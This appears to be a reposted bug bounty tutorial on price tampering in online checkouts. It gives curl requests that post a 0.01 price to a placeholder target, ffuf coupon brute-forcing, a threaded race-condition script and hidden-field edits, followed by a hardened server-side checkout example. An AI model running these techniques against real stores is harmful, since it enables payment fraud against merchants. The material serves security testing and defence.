Price Tampering: A Business Logic Error in Bug Bounty

Learn more about business logic errors from this YouTube video:
https://lnkd.in/gZ75F6Uk

You Should Know:

Price tampering is a common business logic vulnerability where attackers manipulate product prices during transactions. This can occur due to weak server-side validation, insecure API endpoints, or flawed discount logic. Below are practical steps to test and exploit price tampering vulnerabilities:

1. Intercepting and Modifying Requests

Use Burp Suite or OWASP ZAP to intercept HTTP requests during checkout:

# Start Burp Suite (Linux)
java -jar burpsuite_pro.jar

Modify the `price` or `total_amount` parameter before forwarding the request.

2. Testing API Endpoints

Check if APIs allow direct price manipulation:

curl -X POST 'https://target.com/api/checkout' \
-H 'Content-Type: application/json' \
-d '{"product_id": "123", "price": 0.01}'

3. JavaScript Manipulation

If frontend controls pricing, modify JavaScript values in the browser console:

document.getElementById('totalPrice').value = 1;

4. Coupon/Discount Exploitation

Brute-force or reverse-engineer coupon codes:

# Using ffuf for coupon brute-forcing
ffuf -w wordlist.txt -u "https://target.com/apply_coupon?code=FUZZ" -mr "discount_applied"

5. Race Condition Exploitation

Send multiple parallel requests to exploit timing flaws:

# Using Python with threading
import requests
import threading


def exploit():
    # Each thread submits the same tampered price at the same moment
    requests.post('https://target.com/checkout', data={'price': 0.01})


# Launch 20 overlapping requests to probe the timing window
for _ in range(20):
    threading.Thread(target=exploit).start()

6. Bypassing Client-Side Checks

If the frontend validates prices, replay modified requests directly to the backend:

# Using curl to bypass frontend validation
curl -X POST 'https://target.com/process_payment' --data-raw 'original_price=100&modified_price=1'

7. Hidden Parameter Tampering

Check for hidden form fields or API parameters:

<input type="hidden" name="actual_price" value="100.00">

Modify this using browser dev tools or proxy tools.

What Undercode Say

Price tampering is a critical business logic flaw that can lead to significant revenue loss. Always recompute prices server-side from the catalog rather than trusting any price or total submitted by the client, implement strict access controls, and audit discount/coupon logic. Use rate limiting and atomic coupon redemption to prevent race conditions, and monitor for abnormal transactions such as orders whose paid amount does not match the catalog price.
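To make the server-side validation advice concrete, here is an added example (not code from the original post or the linked video): a vulnerable checkout handler that trusts the client's `price` field, next to a hardened one that recomputes the total from a catalog, validates coupons, and marks single-use coupons atomically so the parallel-request pattern from step 5 cannot redeem one twice. The catalog, coupon table, and request shapes are constructed for the demonstration and are assumptions, not any real site's API.

```python
"""Server-side checkout that ignores client-supplied prices.

Added illustration, not code from the original post. The catalog,
coupon table and request dictionaries are constructed for the example.
"""
import threading
from decimal import Decimal

# Constructed catalog: the server's price is the only price that counts.
CATALOG = {"123": Decimal("100.00"), "456": Decimal("25.50")}

# Constructed coupon table: code -> percent off and single-use flag.
COUPONS = {
    "SAVE10": {"percent": 10, "single_use": False},
    "WELCOME50": {"percent": 50, "single_use": True},
}

# In-memory redemption record guarded by a lock (a DB row lock in production).
_redeemed = set()
_redeem_lock = threading.Lock()


def vulnerable_checkout(request):
    """The pattern the post exploits: whatever price the client sends is billed."""
    quantity = int(request.get("quantity", 1))
    return Decimal(str(request["price"])) * quantity


def hardened_checkout(request):
    """Recompute the total from the catalog; client price fields are ignored."""
    product_id = str(request.get("product_id", ""))
    if product_id not in CATALOG:
        raise ValueError("unknown product")

    quantity = request.get("quantity", 1)
    if not isinstance(quantity, int) or not 1 <= quantity <= 100:
        raise ValueError("invalid quantity")

    # Any 'price', 'total_amount' or 'actual_price' key in the request is ignored.
    total = CATALOG[product_id] * quantity

    code = request.get("coupon")
    if code is not None:
        coupon = COUPONS.get(code)
        if coupon is None:
            raise ValueError("invalid coupon")
        if coupon["single_use"]:
            # Atomic check-and-mark: concurrent requests cannot both pass.
            with _redeem_lock:
                if code in _redeemed:
                    raise ValueError("coupon already redeemed")
                _redeemed.add(code)
        total -= total * coupon["percent"] / 100

    return total.quantize(Decimal("0.01"))


def race_single_use_coupon(request, attempts=20):
    """Fire parallel requests at the hardened handler; return how many succeed."""
    successes = []

    def worker():
        try:
            hardened_checkout(request)
            successes.append(1)
        except ValueError:
            pass

    threads = [threading.Thread(target=worker) for _ in range(attempts)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(successes)


if __name__ == "__main__":
    tampered = {"product_id": "123", "price": 0.01}
    print("vulnerable bills:", vulnerable_checkout(tampered))
    print("hardened bills:  ", hardened_checkout(tampered))
    print("parallel redemptions that succeeded:",
          race_single_use_coupon({"product_id": "456", "coupon": "WELCOME50"}))
```

The hardened handler marks the coupon redeemed before payment completes, which is a simplification; in a real system the redemption and the order insert belong in one database transaction so a failed payment releases the coupon. The key property is unchanged: the billed amount is derived only from server-side data, and the redemption check cannot be interleaved.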

Expected Output:

  • Successful price modification at checkout.
  • Unauthorized discounts applied via API manipulation.
  • Proof-of-concept (PoC) demonstrating the exploit.

For deeper insights, refer to the original video: https://lnkd.in/gZ75F6Uk

References:

Reported By: Vbvishalbarot Vapt – Hackers Feeds
